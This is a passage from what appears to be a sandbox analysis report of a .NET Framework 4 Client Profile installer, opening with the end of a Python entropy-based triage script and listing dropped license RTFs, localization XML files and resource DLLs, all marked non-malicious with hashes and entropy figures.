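    """Bits per byte of a byte string: the figure in the 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


if __name__ == "__main__":
    for sha, why in triage(parse_records(SAMPLE_RECORDS)):
        print(sha, "; ".join(why))
```

Run it over the full "Dropped Files" text of a report to get only the entries worth opening. For the two installer records copied above the triage returns nothing, which agrees with their Malicious:false and 0% detection; the RTF and UTF-16 XML entries sit at 3.5 to 4.4 bits/byte and the small resource DLLs at 5 to 6, all well under the packing threshold, as shannon_entropy on their bytes would confirm.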

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1044
Category:dropped
Size (bytes):3046
Entropy (8bit):5.1859499604057495
Encrypted:false
SSDEEP:48:rPN3nffnyzInT7BjTgLDRn0l392N4S2ZOMb5XgNRc9q5QB34pg5lqM9TX/ufMpDn:rPBffyUnT7BjTADRn0lN2N4S2wG5wNRq
MD5:830EBCED0F03F267EEE7A5167C4E91A4
SHA1:740075166941E5623ECB488B0390F25A84FEEC77
SHA-256:2D0B46674BB383A56E6061D25F0D446C8B50C83C92269A3FCCB657429E9EF4BE
SHA-512:CD146C8F35C1095E142EEDF2B486A22593A417138CAE35FBA00DEFB5395D6DAA34C84B6A345AE88A5B365D4E17190FD3C7F3AA384D2D4472E0413F432280F53E
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (691), with CRLF line terminators
Category:dropped
Size (bytes):82374
Entropy (8bit):3.6806551409534465
Encrypted:false
SSDEEP:768:lz2ue+xTxXUpUqTvvUOfUs6LArUpFymrqQtr8BAyfO4RkSzXunasvJH2TF0wpYl7:lz2ue+xTxXUpUOvvUOfUs6LqTavdJkUr
MD5:BDB583C7A48F811BE3B0F01FCEA40470
SHA1:E8453946A6B926E4F4AE5B02BA1D648DAF23E133
SHA-256:611B7B7352188ADFFD6380B9C8A85B8FF97C09A1C293BB7AC0EF5478A0E18AC8
SHA-512:27B02226F8F86CA4D00789317C79E8CA0089F5B910BED14AA664EEAB6BE66E98DE3BAFD7670C895D70AB9C34ECE5F05199F3556FDDC1B165904E3432A51C008D
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18264
Entropy (8bit):5.2854545598714635
Encrypted:false
SSDEEP:192:fa1YUfwxWVxSIn+hnISv7N/blaRr26WneWAQKPnEtObMacxc8hjeyveCXW:iN2Gan9xblaRr26WneWALXci2jpvQ
MD5:550C79640EEE713C73EB67B0736A92E6
SHA1:51656BB182048F0ABFC57DC2DF9703D59E264442
SHA-256:F90002DA2068F868D5A710444EA30F91AE2229DBEB660166C1E28935E4AB6078
SHA-512:F90A9A5C399DEC2649E8EC088139E5FE4DD0419BDF7B5988BE8F437A35040A1E0D2F03D326B8C38B2F4F1CFDBE0269445120D95061BD691296E7C9B20C5EAC31
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):4040
Entropy (8bit):5.362038982382671
Encrypted:false
SSDEEP:96:rTBfQaJRTIRTjzH+oDgQUoIs89FcG5ywI5Et/+TMm9MpDcA/+MvsNcUOsG9jeLdp:Zfo+Bs18ncG5Y5Et/+Z9OwAjs7OtRwdp
MD5:BB93B108D4BE954133380F7709E7BA1E
SHA1:34376037B3C5879142796A2F524E5B3EA6097ED1
SHA-256:4F2D6A8979C89592877555FE8F576D5F631132452AFE86114D35E9531A1CA948
SHA-512:69C60EF8C0E6A8F7A92EC9A9C94C99F6DDE39477D8DEE041ABF7A164025D7EBFC9F0C7399AD8C9ED150861B00FC47F1F1CB40BB245AA87ED7904B1BAE6A4271B
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (669), with CRLF line terminators
Category:dropped
Size (bytes):80738
Entropy (8bit):3.581949939963976
Encrypted:false
SSDEEP:384:4wl7DAQput9emRem6cvMOem6QemIAY/YEQTeQoqk7EHd9nKxXq5fKsLaG5m73Rdv:geOeqeCe1CkyJtG07g
MD5:A03D2063D388FC7A1B4C36D85EFA5A1A
SHA1:88BD5E2FF285EE421CCC523F7582E05A8C3323F8
SHA-256:61D8339E89A9E48F8AE2D929900582BB8373F08D553EC72D5E38A0840B47C8A3
SHA-512:3A219F36E57D90CA92E9FAEC4DFD34841C2C9244DA4FE7E1D70608DDE7857AA36325BDB46652A42922919F782BB7C97F567E69A9FC51942722B8FD66CD4ECAF0
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18264
Entropy (8bit):5.203641313145023
Encrypted:false
SSDEEP:192:zjkTnUfwVWwwZFf7TOS7LDoKGslNDGf8BjWNeWSQKPnEtObMacxc8hjeyveCXKuj:zom6QT7FprmmWNeWSLXci2jpv3j
MD5:86CB58F2B6BC1174D200D0ABE5497233
SHA1:F1174409A44D922C23F376C6BC7609BBDAD5016C
SHA-256:DD7FB50E88355F46D619D89E47D3057ACC1C069178BA81839970BB13479FCF4C
SHA-512:AD4C9124F2459FB83C977B235B7ACDDA86AFAEBE9FEBD8BE084AA50E87AB091331A8724EC517D5096487970A3992C7E3D255CDA31DC494544CABA5DEF9C93DD1
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):3683
Entropy (8bit):5.188584376027454
Encrypted:false
SSDEEP:96:rTBfAlMu9fTp/9fTdIDsGJ1KlhREerHr7uStmESWp55ztFuMpDl/BRwZ+qf+J4Ed:ZfeuqhGeHVIErn1zuO9BC8q2WEHt+B2
MD5:E43708161843A33D34D6FDF966D36397
SHA1:2E5C0450CEBD9A737A90908EEDDAAE2D0B3E2940
SHA-256:0AF1F04F416712387BF87C93FA846B4E8EB0AC25E284A2A3578C58E2724E2778
SHA-512:FB334D29BBBC2D19D20C5260C55BF83D9D6D242C6A8F04AC88F8280A63E6AF32FB5D96703E43D39F6863D17B27D9E0E36CBAB1099127E5FA281255A19AE39E0D
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (712), with CRLF line terminators
Category:dropped
Size (bytes):81482
Entropy (8bit):4.270033694989682
Encrypted:false
SSDEEP:384:4w7iPuXsPXBUhOLGvVVA5/Fpn9zJop9TE+zkX6JS/5cGhj/6v:MP5XyZVrJF
MD5:349B52A81342A7AFB8842459E537ECC6
SHA1:6268343E82FBBABE7618BD873335A8F9F84ED64D
SHA-256:992BF5AEB06AA3701D50C23FA475B4B86D8997383C9F0E3425663CFBD6B8A2A5
SHA-512:EF4CBD3F7F572A9F146A524CFBC2EFBD084E6C70A65B96A42339ADC088E3F0524BC202548340969481E7F3DF3AC517AC34B200B56A3B9957802ABD0EFA951C49
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18264
Entropy (8bit):5.548909804205606
Encrypted:false
SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
MD5:7EF74AF6AB5760950A1D233C582099F1
SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:dropped
Size (bytes):54456
Entropy (8bit):4.950349023670169
Encrypted:false
SSDEEP:768:3CR6rdlWFJv3zGz9tWQ2ni8UNo/8PZrS14Z:3CcrMeDZ
MD5:2277852A45DA18B12BEEC5FB6F08CDC9
SHA1:E564862D098BD111430C4208EAA1ADD5CD52A601
SHA-256:59AD806664E3CE4A024452985C4602D5610126A16FC36ADE018A9756ACCC92CC
SHA-512:ED9726D207479E4DF494C6AF17E64909EA6649DDD8BDC3E37229A73270B4A159B2B11C1ADD462871DD40A23033E6B3F8A26E3EA1FA6E3B7316153AF13B316CD2
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (622), with CRLF line terminators
Category:dropped
Size (bytes):77680
Entropy (8bit):3.602060477304833
Encrypted:false
SSDEEP:384:4w+optBSCVb5v6iMSsCtD7jjktDhHfLSGM3zD0q0Xt//Vvcinnl/06N9mGktJsIO:QqtBSCVb5v69SsuD7jwDkqmGeJsoON
MD5:B3B1A89458BEC6AF82C5386D26639B59
SHA1:D9320B8CC862F40C65668A40670081079B63CEA1
SHA-256:1EF312E8BE9207466FBFDECEE92BFC6C6B7E2DA61979B0908EAF575464E7B7A0
SHA-512:478CE08619490ED1ECDD8751B5F60DA1EE4AC0D08D9A97468C3F595AC4376FECA59E9C72DD9C83B00C8D78B298BE757C6F24A422B7BE8C041F780524844998BF
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17752
Entropy (8bit):5.196946497211754
Encrypted:false
SSDEEP:384:W9U6qxM8IJu5M/oZVQVWpyeWRLXci2jpvE:WIxMwLVWVMi2jpvE
MD5:28813510B82F45868B5BDC67FFF9C9FA
SHA1:696A06D1F7B13C20599C53E74969BDC99AB5D30A
SHA-256:EB0A73F6BFAF65FAA58440D57145709894E9A5354E840805EC02DCE153332249
SHA-512:A01A7C8147138125BBFF7D135FACF255A0284AFABD2BB28D5CB6E54C86A8F1A685855B5561584574A057D4FCFDEF630A10AD262495C58EA5DF974A3249787D9B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1053
Category:dropped
Size (bytes):3865
Entropy (8bit):5.329033876405121
Encrypted:false
SSDEEP:96:rTBfv+/9TfHTGDXtZEOuAs50Y1EIF19VWMpDHvuKMLDBD+d54+QFEp5Tf+8K+l1S:5ffduAs591EIb9gOpqDoDZQmx2W2
MD5:E2F73097FC60F5347BAD1C1E93B2941B
SHA1:8564447AF45B488AC713D898405B759365662598
SHA-256:72860227092C38AE5E00E24C75E9B263E77BD2032EE597AABE408B9176448097
SHA-512:94ECD5BD5053A417BFF3E49C5E7B362843D2C850DA09D389161D4F4D98DE624473E0F143E6A088AB288AB4DA49B7910FFC80F77401009F560B60470FB13609B1
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
Category:dropped
Size (bytes):76818
Entropy (8bit):3.7161950547055933
Encrypted:false
SSDEEP:1536:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frc+iI0jJNJ7rtRpUR:bM8DL5YHRL87mlQg5IgrbGZzwOS8FrcS
MD5:65E771FED28B924942A10452BBBF5C42
SHA1:586921B92D5FB297F35EFFC2216342DAC1AE2355
SHA-256:45E30569A756D9BCBC5F9DAE78BDA02751FD25E1C0AEE471CE112CB4464A6EE2
SHA-512:D014A2A96F3A5C487EF1CADDD69599DBEC15DA5AD689D68009F1CA4D5CB694105A7903F508476D6FFEC9D81386CB184DF6FC428D34F056190CEE30715514A8F7
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17752
Entropy (8bit):5.263298426482242
Encrypted:false
SSDEEP:384:Hfp2mDyEkEIb7/dscoGvXdBXbtRS0W0eW0LXci2jpvhPN:H1DyEkEIFscVXdBXbtRVsMi2jpvhl
MD5:357A1CBF08A83E657FFAE8639AC1212A
SHA1:384DF3D9DBBE27731785D92C257B7BA584FBE5E8
SHA-256:DD7337A6C67B39905A9B01C4212667F27EDFB68E86D1099E20EC37B03C51E7B9
SHA-512:67E47DF1E462A279C909B7B4255BEC4824554890CFF789BDF6691898A66E71DB007794476508F9290D95ACCE908109AA589A3A01A04125AEBB9EFBF67AEBF25F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1254, default language ID 1055
Category:dropped
Size (bytes):3859
Entropy (8bit):5.120677849638168
Encrypted:false
SSDEEP:96:VSfjQOTqfRRTqfSD+vmScfQEz04jMpDLiIzhZLlZhD2:wfcFpcfEo4jOT2
MD5:D71A0D5B6CB13901CD35C036D395BE59
SHA1:B0F83CF648C2E84119A32AFD2E0EF409BB2047CE
SHA-256:A8850F6DBF56B6C55D255E81B15A3D17196EEE89FFBE41CDFCA19205628C1A7B
SHA-512:FE7C6E54014AD963F51850973F5AE5872FBA9843F1C20973F5E875008064F870A5217C2C9ADA3D92A3F1B2DF6318D5137814943D6295E72CF27343DF93B957E1
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (452), with CRLF line terminators
Category:dropped
Size (bytes):60684
Entropy (8bit):4.338517891382778
Encrypted:false
SSDEEP:384:4w7yHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/4mn:dyjg2z2bXXwoZukC7FQKAuXRgcJf
MD5:10DA125EEABCBB45E0A272688B0E2151
SHA1:6C4124EC8CA2D03B5187BA567C922B6C3E5EFC93
SHA-256:1842F22C6FD4CAF6AD217E331B74C6240B19991A82A1A030A6E57B1B8E9FD1EC
SHA-512:D968ABD74206A280F74BF6947757CCA8DD9091B343203E5C2269AF2E008D3BB0A17FF600EB961DBF69A93DE4960133ADE8D606FB9A99402D33B8889F2D0DA710
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14168
Entropy (8bit):6.010838262457833
Encrypted:false
SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
MD5:407CDB7E1C2C862B486CDE45F863AE6E
SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:dropped
Size (bytes):5827
Entropy (8bit):4.418112026919231
Encrypted:false
SSDEEP:96:M5DBmf0jLTCLLgLTCLLmDjxrDT2k9rkKp7aDKaXzaWZMa/O9wzy6n/MpDTKTGptk:EmfJXoQkRGDtXeWZv/O9XmOdZzQJWBBi
MD5:4288C2541843F75C348D825FC8B94153
SHA1:E0DD8ED7BDB3C941A589361EE764F49A3619C264
SHA-256:C30A7597AA67E2847940E2C24F09B35C07B1EC759ADBCA7C8261141FC1ECCA92
SHA-512:7BA9991FE4EED625FE7BEF96A1D3AE70CB7616AAD034236D1A2B346A08B48280CB6C20D2B059DA9953919B0265125FE56DC5F4CC619AC653B4C1164ED564B359
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (665), with CRLF line terminators
Category:dropped
Size (bytes):80254
Entropy (8bit):3.5905984831890927
Encrypted:false
SSDEEP:384:4wdLPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdgysR0AmhRod30J0qf:fenekeCeRuXWpFxgJMh230JMaWs
MD5:7FA9926A4BC678E32E5D676C39F8FB97
SHA1:BBA4311DD30261A9B625046F8A6EA215516C9213
SHA-256:A25EE75C78C24C50440AD7DE9929C6A6E1CC0629009DC0D01B90CBAC177DD404
SHA-512:E06423BC1EA50A566D341DC513828608E9B6611FEA81D33FCA471A38F6B2B61B556EA07A5DEC0830F3E87194975D87F267A5E5E1A2BE5E6A86B07C5BB2BDDCB6
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18776
Entropy (8bit):5.195239987750812
Encrypted:false
SSDEEP:192:8ae5UfwxWr4KyGpTOSZmzmTssa8x91cvWp7eWYQKPnEtObMacxc8hjeyveCXgs:V32NAT7ZmzmYpqUvWp7eWYLXci2jpvas
MD5:58CB55FA4D9E2F62F675720B1269137D
SHA1:472F8E4982369C703C78091E66E33BF6B2A03F09
SHA-256:9C9E0ABFDB8065ECEC3420398DA687FAD4429F4CBF68B7082C8221925BF8D86B
SHA-512:123906A064033F37891DBB9C2A01A990AFD3C8447E38CDF66265784449FDD94806372A589A7DEA074830EB1DF7812E4877A1EE59171D37F1652167A03D2B961B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2070
Category:dropped
Size (bytes):4015
Entropy (8bit):5.250694812846901
Encrypted:false
SSDEEP:96:r4IffB09DkTLGTHD28ygHx0LlHKe1rvGA9mE0Eyh+iH/OMpiKwIurpEpiT0T8x8w:VfB8ygHclqe1ruAYEBm+imOvurerV2
MD5:4518BE9A9BCA5BE1D8AC926A4B2C087D
SHA1:D089427D93EA726380E89ECF00127BD51A4DCFC1
SHA-256:D838ACF5ED559C58F623F73AF4902A13848502778EEA7AF585AC2E801D7C8C45
SHA-512:7BCF5248E36D98D74040B6AFB08CA62A3255E397A26FF6DCA9A8E42BADF71BC0005FD8FE8B3CA3A4896434823A9E3401EEC86EF60B1A6CE395CE21A710626478
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
Category:dropped
Size (bytes):60816
Entropy (8bit):4.3418522371704045
Encrypted:false
SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
MD5:967A6D769D849C5ED66D6F46B0B9C5A4
SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
Malicious:false
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14168
Entropy (8bit):5.9724110685335825
Encrypted:false
SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
MD5:7C136B92983CEC25F85336056E45F3E8
SHA1:0BB527E7004601E920E2AAC467518126E5352618
SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
Category:dropped
Size (bytes):6309
Entropy (8bit):4.470827969332999
Encrypted:false
SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
MD5:6F2F198B6D2F11C0CBCE4541900BF75C
SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
Malicious:false
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79996
                                                                                                                                                                  Entropy (8bit):3.5542515107748844
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZq:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jrq
                                                                                                                                                                  MD5:2D54FE70376DB0218E8970B28C1C4518
                                                                                                                                                                  SHA1:83EE9AC93142751F23D5BB858F7264E27EA2EAB0
                                                                                                                                                                  SHA-256:D17C5B638E2A4D43212D21A2052548C8D4909EB6410E30B8A951A292BCDBBEDD
                                                                                                                                                                  SHA-512:20C0FB9A046911BC2D702AB321C3992262AC0F80F33DDDA5EC2CCAFE9EF07611774223369E0DC7CB91C9CDA1CBD65C598A7E1C914D6E6CA4B00205A16411BE30
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.l. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .n.o. .s.e. .p.u.e.d.e. .e.j.e.c.u.t.a.r. .e.n. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d... .P.a.r.a. .o.b.t.e.n.e.r. .m...s. .i.n.f.o.r.m.a.c.i...n.,. .v.e.a. .e.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.c.h.i.v.o. .L...a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.182140892959793
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                                                                                                                                  MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                                                                                                                                  SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                                                                                                                                  SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                                                                                                                                  SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P............@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3069
                                                                                                                                                                  Entropy (8bit):5.138349598257165
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:MTN3nfZQZXRFOTfyTZQDeK9xxMFcJ55HsUXHNX/RgMzsrMpDgLmqIy3W0b8EwKg3:MTBfZQZhoTfyTZQDeQxpDHsOH1ZvoMp9
                                                                                                                                                                  MD5:D40C65F632063E5CDFEF104E324D0AD4
                                                                                                                                                                  SHA1:49FABA625BADF413763BD913EDB62510D3790E98
                                                                                                                                                                  SHA-256:AAD96E7F4037E977997C630DEC015ECF09CF73C1F5B73F84944E60B309EAAB66
                                                                                                                                                                  SHA-512:6A948FA1602E517021C98861B0DF12FCB707FBBEBF094DDE96D9E60CC7DED30B07C1BF6CA8541117A362B5EB8703D61051CF187083C91076E0AD235CF72B7237
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang3082\b\f0\fs20 T\'c9RMINOS DE LICENCIA COMPLEMENTARIOS DEL SOFTWARE DE MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..Y PAQUETES DE IDIOMA ASSOCIADOS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, en funci\'f3n del lugar en el que resida, una de sus filiales) le concede la licencia para este complemento. Si obtiene la licencia para utilizar el sistema operativo Microsoft Windows (al que se aplica este suplemento), en adelante el "software", podr\'e1 usar e
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201796
                                                                                                                                                                  Entropy (8bit):3.4097027044493644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                                                                                                                                  MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                                                                                                                                  SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                                                                                                                                  SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                                                                                                                                  SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                                                                                                                                  Malicious:false
